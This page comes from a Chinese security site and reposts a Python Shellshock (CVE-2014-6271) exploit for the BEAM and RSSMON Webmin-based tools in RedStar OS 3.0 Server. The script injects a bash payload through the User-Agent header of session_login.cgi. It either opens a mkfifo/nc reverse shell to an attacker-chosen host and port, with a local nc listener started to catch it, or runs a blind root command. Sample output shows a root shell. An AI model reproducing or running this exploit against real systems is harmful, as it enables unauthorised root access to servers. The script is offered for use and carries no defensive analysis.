首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock) 来源：https://github.com/HackerFantastic 作者：HackerFantastic 发布时间：2016-12-20   #!/usr/bin/env python # RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit # ======================================================== # BEAM & RSSMON are Webmin based configuration utilities # that ship with RSS server 3.0. These packages are the # recommended GUI configuration components and listen on # a user specified port from 10000/tcp to 65535/tcp. They # are accessible on the local host only in vanilla install # unless the firewall is disabled. Both services run with # full root permissions and can be exploited for LPE or # network attacks. RSSMON has hardened SELinux policies # applied which hinder exploitation of this vulnerability # be limiting access to network resources. Commands are # still run as root in a blind way. # # $ python rsshellshock.py beam 192.168.0.31 10000 192.168.0.10 8080 # [+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit # [-] exploiting shellshock CVE-2014-6271... # sh: no job control in this shell # sh-4.1# id # uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:beam_t:s0-s15:c0.c1023 # sh-4.1# # # -- Hacker Fantastic (https://myhackerhouse.com) from requests.packages.urllib3.exceptions import InsecureRequestWarning import subprocess import requests import sys import os   def spawn_shell(cbport):     subprocess.call('nc -l ' + cbport, shell=True)   def shellshock(soft,ip,port,cbip,cbport):     requests.packages.urllib3.disable_warnings(InsecureRequestWarning)     if soft == "beam":         user_agent = {'User-agent': '() { :; }; /bin/bash -c "rm /tmp/.f;mkfifo /tmp/.f;cat /tmp/.f|/bin/sh -i 2>&1|nc '+cbip+' '+cbport+' >/tmp/.f"'}     else:         shellstring = '() { :; }; /bin/bash -c "%s"' % (cbip)         user_agent = {'User-agent': shellstring}     print "[-] exploiting shellshock CVE-2014-6271..."     myreq = requests.get("https://"+ip+":"+port+"/session_login.cgi", headers = user_agent, verify=False)   if __name__ == "__main__":     print "[+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit"     if len(sys.argv) < 5:         print "[-] Use with <beam> <host> <port> <connectback ip> <connectback port>"         print "[-] Or with <rssmon> <host> <port> <cmd>"         sys.exit()     if(sys.argv[1]=="beam"):         newRef=os.fork()         if newRef==0:             shellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])            else:             spawn_shell(sys.argv[5])     else:         shellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],0)   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Naenara Browser 3.5 (RedStar 3 ·ntop-ng 2.5.160805 - Username ·Microsoft Internet Explorer 9 ·Google Chrome < 31.0.1650.48 - ·iOS 10.1.1 / macOS 10.12 16A32 ·Microsoft Internet Explorer 11 ·Horos 2.1.0 DICOM Medical Imag ·Microsoft Edge - SIMD.toLocale ·DCMTK 3.6.0 storescp - Stack B ·Microsoft Edge - International ·ConQuest DICOM Server 1.4.17d ·NETGEAR WNR2000v5 - Remote Cod   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved